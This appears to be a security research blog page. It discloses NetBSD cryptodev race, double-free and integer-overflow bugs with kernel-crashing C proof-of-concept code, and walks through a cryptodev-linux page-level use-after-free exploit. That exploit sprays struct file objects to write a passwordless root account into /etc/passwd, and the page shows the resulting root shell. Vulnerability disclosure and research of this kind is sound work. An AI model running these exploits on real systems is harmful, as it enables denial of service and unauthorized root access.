nasm.re

[Netbsd - cryptodev] One integer overflow and plenty of UAF

Fri, 06 Feb 2026 00:00:00 GMT

Introduction

The NetBSD opencrypto framework provides a standardized interface for kernel-level cryptographic operations, allowing userspace applications to leverage hardware acceleration. This post breaks down three distinct vulnerabilities discovered in the ioctl handling of the crypto operations in /dev/crypto reachable from an unpriviledged user. These vulnerabilities were discovered through fuzzing with Syzkaller. These bugs were assigned: CVE-2026-32848 (Session lifecycle race condition → UAF / double-free) and CVE-2026-32849 (Integer handling flaw → NULL pointer dereference).

UAF, Double-Free, and NULL Dereference

The vulnerabilities found in cryptof_ioctl and cryptodev_op highlight a fundamental architectural issue: the lack of proper synchronization between session management and active crypto operations.

The Session Lifetime Race (CWE-416): A race condition between CIOCCRYPT (executing an operation) and CIOCFSESSION (tearing down a session). Because the global mutex is released prematurely, a session can be freed while it is still being accessed, resulting in a Use-After-Free.
Concurrent UIO Race: (linked to the first bug) By storing mutable request state directly within the shared session structure, the kernel fails to protect against multiple threads using the same session ID. This leads to a heap corruption (uaf or double free depending on the window) as threads overwrite each other's allocations.
Integer overflow (leading to CWE-476): A logic error in cryptodev_op allows a user-controlled unsigned value to overflow a signed integer. This causes the kernel to bypass critical memory allocations while continuing with data copies, resulting in a NULL Pointer Dereference and a system-wide kernel panic.

Race Condition in `cryptof_ioctl` / `cryptodev_op`: Use-After-Free & Double-Free

Affected Component

Field	Value
File	`sys/opencrypto/cryptodev.c`
Functions	`cryptof_ioctl()` (`CIOCCRYPT`, `CIOCFSESSION`), `cryptodev_op()`
Type	CWE-416: Use-After-Free / CWE-415: Double-Free
Impact	Kernel panic, heap corruption primitive

CIOCCRYPT/CIOCFSESSION Session Lifetime Race

CIOCCRYPT drops cryptodev_mtx after csefind but before cryptodev_op completes. A concurrent CIOCFSESSION (or cryptof_close) on another thread can call csedelete + csefree on the same session in this window, causing cryptodev_op to operate on a freed cse.

cse = csefind(fcr, cop->ses);
mutex_exit(&cryptodev_mtx);   /* window opens here */
/* concurrent CIOCFSESSION frees cse */
error = cryptodev_op(cse, cop, curlwp);  /* UAF */

Concurrent `cryptodev_op` on the Same Session: `uio` Race

cse->uio and cse->iovec are stored directly in the csession struct. When two threads call CIOCCRYPT with the same session ID simultaneously, both enter cryptodev_op with the same cse pointer and race on:

cse->uio.uio_iov[0].iov_len  = iov_len;
cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);  /* both threads allocate */

Thread B overwrites the pointer allocated by thread A. Both threads then reach the bail: cleanup and free whichever pointer is currently in cse->uio.uio_iov[0].iov_base, producing a double-free on one allocation and a leak on the other.

bail:
    if (cse->uio.uio_iov[0].iov_base)
        kmem_free(cse->uio.uio_iov[0].iov_base, iov_len);  /* double-free */

Root Cause

Both bugs share the same underlying cause: csession embeds mutable per-operation state (uio, iovec, error) directly in the session struct, and CIOCCRYPT provides no per-session serialization after releasing cryptodev_mtx.

Proof of Concept

See attached PoC. poc_uaf_cioccrypt_race() races CIOCCRYPT against CIOCFSESSION to trigger Bug 1. poc_uio_race() hammers the same session from 8 threads to trigger Bug 2.

Fix

Add a per-csession reference count (or rwlock) incremented by csefind and decremented after cryptodev_op returns, so csefree blocks until all in-flight operations complete.
Move uio/iovec off the csession struct and onto the stack (or a per-call allocation) inside cryptodev_op to eliminate the shared mutable state entirely.

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/fcntl.h>
#include <crypto/cryptodev.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

static int cryptofd;
static uint32_t shared_ses;
static volatile int stop;

static uint32_t
make_session(int fd)
{
    struct session_op sop;
    uint8_t key[16];

    memset(&sop, 0, sizeof(sop));
    memset(key, 0x41, sizeof(key));
    sop.cipher   = CRYPTO_AES_CBC;
    sop.keylen   = sizeof(key);
    sop.key      = key;

    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
        err(1, "CIOCGSESSION");

    return sop.ses;
}

static void *
thread_crypt(void *arg)
{
    struct crypt_op cop;
    uint8_t src[32], dst[32], iv[16];

    memset(src, 0x41, sizeof(src));
    memset(iv,  0x00, sizeof(iv));

    while (!stop) {
        memset(&cop, 0, sizeof(cop));
        cop.ses = shared_ses;
        cop.op  = COP_ENCRYPT;
        cop.len = sizeof(src);
        cop.src = src;
        cop.dst = dst;
        cop.iv  = iv;
        ioctl(cryptofd, CIOCCRYPT, &cop);
    }
    return NULL;
}

static void *
thread_free(void *arg)
{
    while (!stop) {
        uint32_t ses = shared_ses;
        ioctl(cryptofd, CIOCFSESSION, &ses);
        shared_ses = make_session(cryptofd);
    }
    return NULL;
}

static void
poc_uaf_cioccrypt_race(void)
{
    pthread_t ta, tb;

    printf("[*] PoC 1: CIOCCRYPT/CIOCFSESSION UAF race\n");

    cryptofd = open("/dev/crypto", O_RDWR);
    if (cryptofd < 0)
        err(1, "open /dev/crypto");

    shared_ses = make_session(cryptofd);
    stop = 0;

    pthread_create(&ta, NULL, thread_crypt, NULL);
    pthread_create(&tb, NULL, thread_free,  NULL);

    sleep(5);
    stop = 1;

    pthread_join(ta, NULL);
    pthread_join(tb, NULL);

    close(cryptofd);
    printf("[*] PoC 1 done (check dmesg for KCSAN/panic)\n");
}

#define NTHREADS 8

static uint32_t poc2_ses;
static int      poc2_fd;

static void *
thread_crypt_same_ses(void *arg)
{
    struct crypt_op cop;
    uint8_t src[32], dst[32], iv[16];
    int i;

    memset(src, 0x42, sizeof(src));
    memset(iv,  0x00, sizeof(iv));

    for (i = 0; i < 10000; i++) {
        memset(&cop, 0, sizeof(cop));
        cop.ses = poc2_ses;
        cop.op  = COP_ENCRYPT;
        cop.len = sizeof(src);
        cop.src = src;
        cop.dst = dst;
        cop.iv  = iv;
        ioctl(poc2_fd, CIOCCRYPT, &cop);
    }
    return NULL;
}

static void
poc_uio_race(void)
{
    pthread_t threads[NTHREADS];
    int i;

    printf("[*] PoC 2: concurrent CIOCCRYPT same session (cse->uio race)\n");

    poc2_fd = open("/dev/crypto", O_RDWR);
    if (poc2_fd < 0)
        err(1, "open /dev/crypto");

    poc2_ses = make_session(poc2_fd);

    for (i = 0; i < NTHREADS; i++)
        pthread_create(&threads[i], NULL, thread_crypt_same_ses, NULL);
    for (i = 0; i < NTHREADS; i++)
        pthread_join(threads[i], NULL);

    close(poc2_fd);
    printf("[*] PoC 2 done\n");
}

int
main(void)
{
    poc_uaf_cioccrypt_race();
    poc_uio_race();
    return 0;
}

NULL Pointer Dereference in cryptodev_op

Field	Value
File	`sys/opencrypto/cryptodev.c`
Function	`cryptodev_op()`
Type	CWE-190: Integer Overflow / CWE-476: NULL Pointer Dereference
Impact	Kernel panic (DoS)

Root Cause

iov_len is declared as int (signed) but assigned from cop->dst_len which is u_int (unsigned). When cop->dst_len > INT_MAX, the assignment produces a negative value — undefined behavior per the C standard. On x86-64 with -O2, the compiler may eliminate the subsequent safety check entirely.

int iov_len = cop->len;           /* signed */
if ((cse->tcomp) && cop->dst_len) {
    if (iov_len < cop->dst_len)
        iov_len = cop->dst_len;   /* UB: u_int -> int, wraps negative */
}
/* size_t <- negative int -> 0xffffffff80000001 */
cse->uio.uio_iov[0].iov_len = iov_len;
/* FALSE or optimized away under -O2 */
if (iov_len > 0)
    cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);
/* corrupted: 0xffffffff80000001 */
cse->uio.uio_resid = cse->uio.uio_iov[0].iov_len;
/* iov_base = NULL -> fault */
copyin(cop->src, cse->uio.uio_iov[0].iov_base, cop->len);

Trigger Conditions

Field	Value
Session type	Compression session (`CRYPTO_DEFLATE_COMP` or `CRYPTO_GZIP_COMP`)
`cop->dst_len`	`> INT_MAX` (e.g. `0x80000001`)
`cop->dst_len`	`> cop->len` to trigger the `iov_len` overwrite path

Proof-of-concept:

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/fcntl.h>
#include <crypto/cryptodev.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

/*
 * PoC: two bugs demonstrated
 *
 * Bug A: iov_len signed overflow → NULL iov_base → copyin NULL ptr
 *   Requires: tcomp session, dst_len > INT_MAX
 *   Effect: copyin(src, NULL, len) → kernel fault
 *
 * Bug B: large iov_len allocation via dst_len, then early bail
 *   via cop->iv on compression-only session (crde==NULL)
 *   Effect: allocates large buffer, bails, frees correctly BUT
 *           the copyin into that large buffer happens BEFORE the
 *           iv check — so we get copyin of 16 bytes into a large
 *           buffer then free it — demonstrates the logic inversion
 *           (should validate iv before allocating)
 */

static int
open_crypto(void)
{
    int fd = open("/dev/crypto", O_RDWR);
    if (fd < 0) err(1, "open /dev/crypto");
    return fd;
}

static uint32_t
make_comp_session(int fd, int alg)
{
    struct session_op sop;
    memset(&sop, 0, sizeof(sop));
    sop.comp_alg = alg;
    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
        err(1, "CIOCGSESSION");
    printf("[*] comp session id=%u alg=%d\n", sop.ses, alg);
    return sop.ses;
}

static uint32_t
make_cipher_session(int fd)
{
    struct session_op sop;
    uint8_t key[16];
    memset(&sop, 0, sizeof(sop));
    memset(key, 0x41, sizeof(key));
    sop.cipher = CRYPTO_AES_CBC;
    sop.keylen = sizeof(key);
    sop.key    = key;
    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
        err(1, "CIOCGSESSION cipher");
    printf("[*] cipher session id=%u\n", sop.ses);
    return sop.ses;
}

/*
 * Bug A: NULL iov_base via signed overflow of iov_len
 *
 * Execution path:
 *   cop->len=16 → iov_len=16
 *   cop->dst_len=0x80000001 → iov_len=0x80000001 (UB, negative as int)
 *   iov_len > 0 → FALSE → iov_base not allocated → NULL
 *   uio_resid = (size_t)(negative) → 0xffffffff80000001
 *   copyin(cop->src, NULL, 16) → fault
 */
static void
bug_a_null_iov_base(void)
{
    int fd = open_crypto();
    uint32_t ses = make_comp_session(fd, CRYPTO_DEFLATE_COMP);

    struct crypt_op cop;
    uint8_t src[16], dst[16];
    memset(src, 0x41, sizeof(src));
    memset(&cop, 0, sizeof(cop));

    cop.ses     = ses;
    cop.op      = COP_COMP;
    cop.len     = 16;
    cop.src     = src;
    cop.dst     = dst;
    cop.dst_len = 0x80000001;   /* > INT_MAX → iov_len goes negative */
    cop.iv      = NULL;
    cop.mac     = NULL;

    printf("[*] Bug A: dst_len=0x%x → iov_len overflow\n", cop.dst_len);
    printf("    expected: copyin to NULL → kernel fault/panic\n");
    if (ioctl(fd, CIOCCRYPT, &cop) < 0)
        warn("    CIOCCRYPT returned error (may have faulted in kernel)");
    else
        printf("    [!] returned OK — check dmesg\n");

    close(fd);
}

int
main(void)
{
    printf("=== cryptodev_op vulnerability PoC ===\n\n");

    printf("--- Bug A: iov_len signed overflow ---\n");
    bug_a_null_iov_base();
    printf("\n");
    return 0;
}

Impact

Scenario	Description
SVS enabled	`copyin` faults on NULL `iov_base` — caught by `onfault` table — clean `EFAULT` returned to userspace, no panic.
SVS disabled (KASAN config)	`copyin` may succeed into a mapped page at `0x0`. UIO machinery consumes the corrupted `uio_resid = 0xffffffff80000001` in pointer arithmetic, producing the non-canonical address `0xfffff9000000000`. This triggers a #GP fault which is not handled by the `copyin` `onfault`/`nofault` recovery table (which only covers page faults), resulting in an unrecoverable kernel panic.

Environment

Depending on your hardware, it might be needed to set kern.cryptodevallowsoft=0 (sysctl -w kern.cryptodevallowsoft=0), by default cryptodev does not allow software requests (and we do not use software implementations in these bugs) but we still need to create sessions and if netbsd is running on qemu, the hardware accelerators will not be available which won't allow us to create sessions.

So basically: this should not be an issue on system running on real hardware but we need to modify it if we run netbsd in qemu.

Here is my environment but the bugs shown above should be reproducible on any Netbsd kernel until a193196bb9d88f0ce1ecaffdaf07fb69ff1de448.

syssec@Syssec:~/netbsd/src$ git diff sys/arch/amd64/conf/GENERIC
diff --git a/sys/arch/amd64/conf/GENERIC b/sys/arch/amd64/conf/GENERIC
index 0fedb047c3e0..a9d86a097a76 100644
--- a/sys/arch/amd64/conf/GENERIC
+++ b/sys/arch/amd64/conf/GENERIC
@@ -166,8 +166,8 @@ options     KDTRACE_HOOKS   # kernel DTrace hooks
 #options       KMSAN_PANIC     # optional
 
 # Kernel Code Coverage Driver.
-#makeoptions   KCOV=1
-#options       KCOV
+makeoptions    KCOV=1
+options        KCOV
 
 # Fault Injection Driver.
 #options       FAULT
@@ -959,7 +959,7 @@ urlphy* at mii? phy ?                       # Realtek RTL8150L internal PHYs
 # USB Controller and Devices
 
 # Virtual USB controller
-#pseudo-device vhci
+pseudo-device  vhci
 
 # PCI USB controllers
 xhci*  at pci? dev ? function ?        # eXtensible Host Controller
@@ -979,7 +979,7 @@ uhci*       at cardbus? function ?          # Universal Host Controller (Intel)
 slhci* at pcmcia? function ?           # ScanLogic SL811HS
 
 # USB bus support
-#usb*  at vhci?
+usb*   at vhci?
 usb*   at xhci?
 usb*   at ehci?
 usb*   at ohci?
syssec@Syssec:~/netbsd/src$ git status | head
On branch trunk
Your branch is up to date with 'origin/trunk'.
...
syssec@Syssec:~/netbsd/src$ git log | head
commit a193196bb9d88f0ce1ecaffdaf07fb69ff1de448
Author: christos <christos@NetBSD.org>
Date:   Sun Mar 8 21:07:26 2026 +0000

    new tzcode

Exploitability

Now that we've been through the root cause analysis of the vulnerabilities we migh wonder how epxloitable this is, and to be honest I am not sure yet of the answer. The most interesting primitive seems to be the race on uio, if thread A provides a very large iov_len and that thread B races on the uio buffer with a small iov_len value it provides a large heap overflow primitive bug:

cse->uio.uio_iov[0].iov_len = iov_len;
if (iov_len > 0)
    cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP); 
// thread A already allocated a buf of size N and thread B allocates a buf of size N-0x1000
cse->uio.uio_resid = cse->uio.uio_iov[0].iov_len;
DPRINTF("lid[%u]: uio.iov_base %p malloced %d bytes\n",
    CRYPTO_SESID2LID(cse->sid),
    cse->uio.uio_iov[0].iov_base, iov_len);

crp = crypto_getreq((cse->tcomp != NULL) + (cse->txform != NULL) + (cse->thash != NULL));
if (crp == NULL) {
    error = ENOMEM;
    goto bail;
}
DPRINTF("lid[%u]: crp %p\n", CRYPTO_SESID2LID(cse->sid), crp);

if (cse->tcomp) {
    crdc = crp->crp_desc;
}

if (cse->thash) {
    crda = crdc ? crdc->crd_next : crp->crp_desc;
    if (cse->txform && crda)
        crde = crda->crd_next;
} else {
    if (cse->txform) {
        crde = crdc ? crdc->crd_next : crp->crp_desc;
    } else if (!cse->tcomp) {
        error = EINVAL;
        goto bail;
    }
}

DPRINTF("ocf[%u]: iov_len %zu, cop->len %u\n",
        CRYPTO_SESID2LID(cse->sid),
        cse->uio.uio_iov[0].iov_len, 
        cop->len);

// If thread B manages to overwrite cse->uio.uio_iov[0].iov_base before reaching this copyin, the heap overflow primitive is possible
// leading to a large heap overflow from thread A which is using the large cop->len on a small overwritten iov_base
if ((error = copyin(cop->src, cse->uio.uio_iov[0].iov_base, cop->len)))
{
    printf("copyin failed %s %d \n", (char *)cop->src, error);
    goto bail;
}

That's the first exploitation idea I had but the race is a little bit tricky. A larger window would be to just reach the end of the cryptodev_op function to trigger the double free primitive:

	if (cse->uio.uio_iov[0].iov_base) {
		kmem_free(cse->uio.uio_iov[0].iov_base,iov_len);
	}

This will reliably lead to a double free with a very flexible size range (from 1 to 256*1024-4 bytes), from there we just need to find interesting objects to spray and to corrupt to achieve a clean privilege escalation. But I will explore this in another blogpost!

Cet objet d’expérience [Erfahrungsmäßige] est la décision et l’acte [der Entschluß und die That] qui s’étendent au-delà du monde; car tout ce qui est susceptible d’expérience provient seulement de la décision et de l’acte. Ils sont la fondation dernière de toutes choses [die lezte Begrün-dung von allem].

(Schelling 1827/28, 75)

[Cryptodev-linux] Page-level UAF exploitation

Mon, 12 Jan 2026 00:00:00 GMT

Introduction

In november 2025 I started a fuzzing campaign against cryptodev-linux as part of a school project. I found +10 bugs (UAF, NULL pointer dereferences and integer overflows) and among all of these bugs one was surprisingly suitable for a privilege escalation.

For a little bit of background, according to their github page:

This is a /dev/crypto device driver, equivalent to those in OpenBSD or FreeBSD. The main idea is to access existing ciphers in kernel space from userspace, thus enabling the re-use of a hardware implementation of a cipher.

Cryptodev-linux is not widely used today, but it was popular when the native kernel crypto (socket) API was slower. Nowadays it is supported and included in various frameworks and projects such as: dpdk, OpenEmbedded and kobol NAS.

Basic design

The cryptodev API is quite straightforward. You first create a session using the file descriptor of the /dev/crypto device, specifying the encryption type and the key size:

session.cipher = CRYPTO_AES_CBC;
session.keylen = KEY_SIZE;
session.key = (void*)key;

if (ioctl(cfd, CIOCGSESSION, &session)) {
    perror("ioctl(CIOCGSESSION)");
    return -1;
}

Then, you can start encrypting data like this:

cryp.ses = session.ses; // session id
cryp.len = CIPHER_SZ;
cryp.src = plain;
cryp.dst = cipher;
cryp.iv = (void*)iv;
cryp.op = COP_ENCRYPT; // it means we want the basic zero copy encryption logic
if (ioctl(cfd, CIOCCRYPT, &cryp)) {
    perror("ioctl(CIOCCRYPT)");
    return -1;
}

The actual encryption logic for zero copy encryptions is located in the __crypto_run_zc function:

/* This is the main crypto function - zero-copy edition */
static int
__crypto_run_zc(struct csession *ses_ptr, struct kernel_crypt_op *kcop)
{
	struct scatterlist *src_sg, *dst_sg;
	struct crypt_op *cop = &kcop->cop;
	int ret = 0;

	ret = get_userbuf(ses_ptr, cop->src, cop->len, cop->dst, cop->len,
	                  kcop->task, kcop->mm, &src_sg, &dst_sg);
	if (unlikely(ret)) {
		derr(1, "Error getting user pages. Falling back to non zero copy.");
		return __crypto_run_std(ses_ptr, cop);
	}

	ret = hash_n_crypt(ses_ptr, cop, src_sg, dst_sg, cop->len);

	release_user_pages(ses_ptr);
	return ret;
}

hash_n_crypt is basically just using the internal crypto drivers of the linux kernel.

release_user_pages is a key part of the exploitation process, it is iterating through the userland pages provided by the user (the src and dst buffers) and is calling put_page on it. Notably, ses->pages is not cleared out.

void release_user_pages(struct csession *ses)
{
	unsigned int i;

	for (i = 0; i < ses->used_pages; i++) {
		if (!PageReserved(ses->pages[i]))
			SetPageDirty(ses->pages[i]);

		if (ses->readonly_pages == 0)
			flush_dcache_page(ses->pages[i]);
		else
			ses->readonly_pages--;

		put_page(ses->pages[i]);
	}
	ses->used_pages = 0;
}

These pages (ses->pages) are returned by get_user_pages_remote in __get_userbuf. __get_userbuf is returning an array of struct page*, what happens is that, to be able to handle the userland pages, the linux crypto drivers need to have a proper scatterlist initialized such as each node contains a reference to the target userland page.

By returning this array, get_user_pages_remote increments the refcount of each of these pages. So what happens is that release_user_pages is releasing these references towards the struct page* used during the encryption request. And releasing references means basically to decrement the reference counter.

The bug

The exploitable bug we will be focusing on in this blogpost lies in the get_userbuf function:


/* make src and dst available in scatterlists.
 * dst might be the same as src.
 */
int get_userbuf(struct csession *ses,
                void *__user src, unsigned int src_len,
                void *__user dst, unsigned int dst_len,
                struct task_struct *task, struct mm_struct *mm,
                struct scatterlist **src_sg,
                struct scatterlist **dst_sg)
{
	int src_pagecount, dst_pagecount;
	int rc;

	/* Empty input is a valid option to many algorithms & is tested by NIST/FIPS */
	/* Make sure NULL input has 0 length */
	if (!src && src_len)
		src_len = 0;

	/* I don't know that null output is ever useful, but we can handle it gracefully */
	/* Make sure NULL output has 0 length */
	if (!dst && dst_len)
		dst_len = 0;

	src_pagecount = PAGECOUNT(src, src_len);
	dst_pagecount = PAGECOUNT(dst, dst_len);

	ses->used_pages = (src == dst) ? max(src_pagecount, dst_pagecount)
	                               : src_pagecount + dst_pagecount;

	ses->readonly_pages = (src == dst) ? 0 : src_pagecount;

	if (ses->used_pages > ses->array_size) {
		rc = adjust_sg_array(ses, ses->used_pages);
		if (rc)
			return rc;
	}

	if (src == dst) {	/* inplace operation */
		/* When we encrypt for authenc modes we need to write
		 * more data than the ones we read. */
		if (src_len < dst_len)
			src_len = dst_len;
		rc = __get_userbuf(src, src_len, 1, ses->used_pages,
			               ses->pages, ses->sg, task, mm);
		if (unlikely(rc)) {
			derr(1, "failed to get user pages for data IO");
			return rc;
		}
		(*src_sg) = (*dst_sg) = ses->sg;
		return 0;
	}

	*src_sg = NULL; /* default to no input */
	*dst_sg = NULL; /* default to ignore output */

	if (likely(src)) {
		rc = __get_userbuf(src, src_len, 0, ses->readonly_pages,
					   ses->pages, ses->sg, task, mm);
		if (unlikely(rc)) {
			derr(1, "failed to get user pages for data input");
			return rc;
		}
		*src_sg = ses->sg;
	}

	if (likely(dst)) {
		const unsigned int writable_pages =
			ses->used_pages - ses->readonly_pages;
		struct page **dst_pages = ses->pages + ses->readonly_pages;
		*dst_sg = ses->sg + ses->readonly_pages;

		rc = __get_userbuf(dst, dst_len, 1, writable_pages,
					   dst_pages, *dst_sg, task, mm);
		if (unlikely(rc)) {
			derr(1, "failed to get user pages for data output");
			release_user_pages(ses);  /* FIXME: use __release_userbuf(src, ...) */
			return rc;
		}
	}
	return 0;
}

There are actually a lot of issues with this function, including tons of integer overflows, but what is interesting is that if the destination exists, is and invalid and that the src is NULL for example, then the last call to __get_userbuf will fail and call release_user_pages at line 77.

At this point, ses->used_pages contains the number of pages of the destination buffer given src != dst.

The bug is basically that release_user_pages is called while ses->pages hasn't been modified and that ses->used_pages exists. It leads to a double free. Not exactly a double free, it allows an attacker to decrement the reference counter of a userland page he controls as many times as he want to.

When the reference counter hits zero the page gets freed, it gets freed while we can still access it through the PTEs of our process which is a very powerful UAF primitive.

Exploitation

Now I described the bug, we can have fun exploiting this powerful primitive!

The exploitation strategy is actually quite simple: triggering a slab request for our set of freed pages so we can hijack interesting structures.

When a page is freed, it is initially sent back to the Per-CPU Page allocator (PCP), which is not ideal if we want to reallocate it as a slab. When a slab requires more memory, it allocates pages through the buddy allocator. Therefore, the first step is to return our pages to the buddy allocator. To achieve this, we must flush the PCP, which typically occurs when a large volume of pages is freed simultaneously.

To trigger this, we can allocate a large number of pages prior to triggering the bug, and immediately afterward, free the entire set of allocated pages:


#define MAX_PAGES 1000000
void *pages[MAX_PAGES];
int page_count = 0;

void free_all_pages(int count) {
    for (int i = 0; i < count; i++) {
        if (pages[i] != MAP_FAILED) {
            munmap(pages[i], 4096);
            pages[i] = MAP_FAILED;
        }
    }
    page_count -= count;
}

void stress_pcp_flush(int count) {
    for (int i = 0; i < count && page_count < MAX_PAGES; i++) {
        pages[page_count] = mmap(NULL, 4096, 
                                PROT_READ | PROT_WRITE,
                                MAP_PRIVATE | MAP_ANONYMOUS,
                                -1, 0);
        if (pages[page_count] != MAP_FAILED) {
            // Touch to commit
            ((char*)pages[page_count])[0] = 'A' + (i % 26);
            page_count++;
        }
    }
}

...
stress_pcp_flush(300000);

cryp.ses = session.ses;
cryp.len = CIPHER_SZ;
cryp.src = NULL;
cryp.dst = (uint8_t* )0xdeadbeef;
cryp.iv = (void*)iv;
cryp.op = COP_ENCRYPT;

if (ioctl(cfd, CIOCCRYPT, &cryp)) {
    //perror("ioctl(CIOCCRYPT)");
}

free_all_pages(300000);

This will successfully flush the vulnerable pages back to the buddy allocator.

Page migration

This is the only tricky part of the exploit, because slabs are typically allocated using GFP_KERNEL. For example, a struct file* is allocated this way, which causes the buddy allocator to look for pages that are unmovable (MIGRATE_UNMOVABLE). This logic is handled within __rmqueue:


/*
 * Do the hard work of removing an element from the buddy allocator.
 * Call me with the zone->lock already held.
 */
static __always_inline struct page *
__rmqueue(struct zone *zone, unsigned int order, int migratetype,
	  unsigned int alloc_flags, enum rmqueue_mode *mode)
{
	struct page *page;

	if (IS_ENABLED(CONFIG_CMA)) {
		/*
		 * Balance movable allocations between regular and CMA areas by
		 * allocating from CMA when over half of the zone's free memory
		 * is in the CMA area.
		 */
		if (alloc_flags & ALLOC_CMA &&
		    zone_page_state(zone, NR_FREE_CMA_PAGES) >
		    zone_page_state(zone, NR_FREE_PAGES) / 2) {
			page = __rmqueue_cma_fallback(zone, order);
			if (page)
				return page;
		}
	}

	/*
	 * First try the freelists of the requested migratetype, then try
	 * fallbacks modes with increasing levels of fragmentation risk.
	 *
	 * The fallback logic is expensive and rmqueue_bulk() calls in
	 * a loop with the zone->lock held, meaning the freelists are
	 * not subject to any outside changes. Remember in *mode where
	 * we found pay dirt, to save us the search on the next call.
	 */
	switch (*mode) {
	case RMQUEUE_NORMAL:
		page = __rmqueue_smallest(zone, order, migratetype);
		if (page)
			return page;
		fallthrough;
	case RMQUEUE_CMA:
		if (alloc_flags & ALLOC_CMA) {
			page = __rmqueue_cma_fallback(zone, order);
			if (page) {
				*mode = RMQUEUE_CMA;
				return page;
			}
		}
		fallthrough;
	case RMQUEUE_CLAIM:
		page = __rmqueue_claim(zone, order, migratetype, alloc_flags);
		if (page) {
			/* Replenished preferred freelist, back to normal mode. */
			*mode = RMQUEUE_NORMAL;
			return page;
		}
		fallthrough;
	case RMQUEUE_STEAL:
		if (!(alloc_flags & ALLOC_NOFRAGMENT)) {
			page = __rmqueue_steal(zone, order, migratetype);

			if (page) {
				*mode = RMQUEUE_STEAL;
				return page;
			}
		}
	}
	return NULL;
}

It will first look for pages of the same order and migratetype, then it will look for pages of higher order (increasing the risk of fragmentation) with the same migratetype, and finally, it will look for pages of a different migratetype. This is exactly what we want for our exploit.

To address this issue, we just need to adjust one thing: the spray of userland pages in our process. I mentioned page migration from MIGRATE_UNMOVABLE requests to MIGRATE_MOVABLE, but the opposite is also true. If we allocate a large number of pages in our process, it will exhaust the MIGRATE_UNMOVABLE buddy allocator freelists as well. Consequently, when we start spraying the target objects, the RMQUEUE_STEAL switch case will be reached quickly.

struct file spraying

I am not sure about the official name of this technique. Kuzey calls it DirtyCred, but to me, DirtyCred implies struct cred * swapping, which is not what is happening here. However, a file-based DirtyCred method was previously demonstrated by StarLabs. Regardless, I am using the technique described in the Exodus Intelligence blog post.

The technique is straightforward: once we have successfully sprayed enough struct file objects in memory, we search for the ext4_file_operations pointer pattern, which corresponds to the second field of the struct file. Once found, we simply modify the file mode. This allows us to write to the file even if it was originally opened with read-only permissions.

A good target file would be /etc/passwd, as a non-root user we are allowed to open it in read only and thanks to this technique we can write arbitrary content to this file:

for (int i = 0; i < 10485; i++) {
    fd = open("/etc/passwd", O_RDONLY);
}

int offt_mode = find_ext4_ops(plain, CIPHER_SZ) - 4;

if (offt_mode < 0) {
    printf("[-] Failed to find ext4_file_operations pointer in plain\n");

    offt_mode = find_ext4_ops(cipher, CIPHER_SZ) - 4;

    if (offt_mode < 0) {
        printf("[-] Failed to find ext4_file_operations pointer in cipher\n");
        printf("[+] Trying again!...\n");

        return loop_xpl(cfd);
    }

    *(uint32_t* )&cipher[offt_mode] |= (FMODE_WRITE | FMODE_CAN_WRITE);
} else {
    *(uint32_t* )&plain[offt_mode] |= (FMODE_WRITE | FMODE_CAN_WRITE);
}

const char *evil_user = "nasm::0:0:root:/root:/bin/bash\n";
for (size_t i = 3; i < 10485 + 3; i++)
{
    if (write(i, evil_user, sizeof(evil_user)) > 0) {
        printf("[+] Wrote evil user to fd %zu\n", i);
        close(i);
        break;
    }
    
    close(i);
}

If we failed to spray correctly the struct file, nothing stops us to try it again, and again. Which makes the exploit pretty stable!

Which gives:

nasm@syzkaller:~$ ./poc 
[*] Increasing file descriptor limit...
[*] Triggered the bug...
[*] Spraying file objects...
[-] Failed to find ext4_file_operations pointer in plain
[-] Failed to find ext4_file_operations pointer in cipher
[+] Trying again!...
[*] Triggered the bug...
[*] Spraying file objects...
[+] Found potential ext4_ops: 0xffffffffab631340 at offset 0x8
[*] Done. Check /etc/passwd for new root user 'nasm'.

nasm@off:/media/cryptodev-linux-exploit$ ssh -p 10021 nasm@127.0.0.1
...
nasm@syzkaller:~# id
uid=0(nasm) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0

You can find the final exploit code here.

Misc

I used the following kernel options to compile my kernel: make defconfig && make kvm_guest.config && ./scripts/config -e CONFIG_DEBUG_INFO_DWARF4 -e CONFIG_CONFIGFS_FS && make olddefconfig You can download the kernel source from https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.15.4.tar.gz:

6bfb8a8d4b33ddbec44d78789e0988a78f5f5db1df0b3c98e4543ef7a5b15b97  linux-6.15.4.tar.gz

I used the following qemu options:

qemu-system-x86_64 \
	-m 2G \
	-smp 2 \
	-kernel "/media/kernel_fuzzing/cryptodevFuzzing/linux-exploit/arch/x86/boot/bzImage" \
	-append "console=ttyS0 kaslr root=/dev/sda earlyprintk=serial net.ifnames=0" \
	-drive file="/media/nixos/Documents/syzkaller/bullseye.img",format=raw \
	-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
	-net nic,model=e1000 \
	-nographic \
	-pidfile vm.pid \
	>&1 | tee vm.log

You might have to adjust the amount of pages you spray according to the amount of memory / cores of the target system.

VirtualBox fuzzing - improvements

Sat, 01 Nov 2025 00:00:00 GMT

Introduction

In my last article I implemented a basic harness for the XHCI VirtualBox device. I wasn't satisfied with the coverage so I kept trying to improve the harness (and made slight changes in the KVM / qemu code) to be able to fuzz both of the fast and slow path at the same time. The code material is available here.

Issues due to the design of VirtualBox devices

Each VirtualBox device has a fast path and a slow path. The fast path is handled directly in kernel land (ring-0), right after the guest triggers a MMIO or I/O port access. This is the code path executed synchronously during a VM-exit, while the virtual CPU is paused and control is temporarily transferred to the VirtualBox hypervisor.

The slow path, on the other hand, is handled in user land (ring-3), within the VirtualBox device emulation process. Most of the actual device logic (USB transactions, command ring parsing, descriptor handling, etc.) lives here. And until now I was unable to actually reach that part.

Actually the issue is:

If I want my harness to be reliable I better target the fast path first and if the slow path needs to handle the current fuzz interation content of the request will be handled by the I/O Monitor (IOM) and will be consumed by another ring-3 thread.

Patching qemu and KVM-PT

